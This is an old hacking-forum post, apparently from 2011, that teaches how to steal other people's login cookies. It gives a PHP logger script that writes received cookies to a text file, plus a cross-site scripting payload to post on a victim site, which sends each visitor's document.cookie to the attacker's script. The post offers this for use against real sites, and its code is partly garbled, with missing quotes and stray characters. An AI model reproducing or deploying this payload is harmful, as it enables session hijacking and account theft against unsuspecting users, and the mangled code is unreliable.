Welcome Guest
THE HACKING TOAD
[ New messages · Members · Forum rules · Search · RSS ]
  • Page 1 of 1
  • 1
Cookie stealing
PREETDate: Saturday, 2011-10-29, 6:19 PM | Message # 1
Sergeant
Group: Administrators
Messages: 36
Reputation: 5
Status: Offline
In this tutorial you'll learn how to steal someones login cookie.
Open notepad.
There type:
<?php
$cookie = $_GET['cookie'];
$log = fopen( log.txt , a );


� �
fwrite($log, $cookie . \n );



fclose($log);
?>
After that save is at .php.
Than go to a site where you want to steal login cookies.
Than make a post which should look like this:
<script>
document.location = http://linkofyourphp.php?cookie= + document.cookie;



</script>
Than who enters there will send you his login cookie for that site.Login cookie will be in .txt file.
I h
ope thatworks for you.
 
  • Page 1 of 1
  • 1
Search:


Login form
Our poll
What do you use to access Net?
Total of answers: 6
Search